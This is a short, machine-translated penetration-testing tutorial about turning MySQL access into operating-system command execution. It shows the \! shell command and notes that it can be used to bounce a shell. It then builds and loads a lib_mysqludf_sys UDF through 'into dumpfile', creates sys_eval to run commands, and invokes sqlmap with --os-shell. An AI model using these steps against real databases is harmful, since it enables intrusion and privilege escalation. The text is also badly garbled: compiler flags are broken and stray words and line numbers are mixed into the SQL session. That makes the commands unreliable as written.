One, the system command in MySQL
Added the system command in MySQL 5.x, the simple symbol is \!, so that MySQL can execute the command
1 Echo " 12345 " 2 12345
Because of a whim, you can use this method to bounce shells.
Result OK:
Try and select splicing execution, this is successful
Think of the fact that this can be spliced in the SQL injection statement to execute OS commands, or can be connected to MySQL directly after the OS command bounce shell.
Second, MySQL UDF extract right
Here are examples of Linux-based operating systems, server-side with Windows really boring, although there are many. Https://github.com/mysqludf/lib_mysqludf_sys after decompression into (git clone directly into) directory:
1 gcc -dmysql_dynamic_plugin-fpic-wall-i/usr/include/mysql-i.-shared lib_mysqludf_sys.c-o lib_mysqludf_ Sys.so
If you encounter an error:
1 file included from LIB_MYSQLUDF_SYS.C:2 /usr/include/mysql/my_global.h: 626:file or directory
The following modifications can be made: Modify the/usr/include/mysql/my_global.h file, comment 626 lines and recompile. and use Hex.hta to get 16 binary.
1Mysql> Show variables like'%plugin%';2+---------------+-------------------------+3| variable_name | Value |4+---------------+-------------------------+5| Plugin_dir | /usr/lib64/mysql/plugin |6+---------------+-------------------------+7 1RowinchSet (0.00sec)8 9Mysql>Select*From func; #检查是否已经有人导出过了TenMysql>SelectUnhex ('Hexcode') into DumpFile'/usr/lib64/mysql/plugin/mysqludf.so'; OneQuery OK,1Row affected (0.01SEC) #需要有/usr/lib64/mysql/plugin/Write permissions for the directory A -Mysql> CreatefunctionSys_eval returnsstringSoname'mysqludf.so'; -Query OK,0Rows Affected (0.00sec) the -Mysql>SelectSys_eval ('WhoAmI'); -+--------------------+ -| Sys_eval ('WhoAmI') | ++--------------------+ -|MySQL +| A+--------------------+ at 1RowinchSet (0.03sec) - -Mysql>Select*From func; -+----------+-----+-------------+----------+ -| name | RET | DL | Type | -+----------+-----+-------------+----------+ in| Sys_eval |0| mysqludf.so |function| -+----------+-----+-------------+----------+ to 1RowinchSet (0.00sec) + -Mysql> DropfunctionSys_eval; theQuery OK,0Rows Affected (0.00sec) * $Mysql>Select*From func;Panax NotoginsengEmpty Set (0.00Sec
or use Sqlmap to enforce the right:
1 " Mysql://root:[email protected]:3306/test " --os-Shell2 #test的地方是database name
MySQL system commands used in penetration testing and UDF rights